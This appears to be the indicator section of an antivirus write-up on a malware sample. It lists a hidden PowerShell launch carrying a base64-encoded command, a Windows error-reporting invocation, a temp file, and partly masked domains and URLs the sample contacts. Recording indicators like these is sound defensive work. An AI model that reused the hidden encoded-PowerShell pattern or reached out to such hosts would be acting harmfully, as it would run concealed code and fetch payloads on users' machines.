Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABUAHcAZwBoAGwAbABhAGUAcgBrAGcAaABzAD0AJwBZAHkAeQB4AHEAeQBuAGYAcABzACcAOwAkAEIAcAByAHoAdQByAGUAdAB5ACAAPQAgACcAMgA2ADcAJwA7ACQARQBqAGoAYQBtAHcAbwBiAHYAYgBpAHM...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1584
- %TEMP%\1384961.cvr
- 'ir.###erceptors.com':80
- 'vi###-smart.com':80
- http://www.vi###-smart.com/zzcj/oo3eb-x2kylgj-282/
- http://www.vi###-smart.com/zzcj/oo3eb-x2kylgj-282/1
- DNS ASK ir.###erceptors.com
- DNS ASK vi###-smart.com
- DNS ASK ca###owuzhi.xyz
- DNS ASK pl##ky.app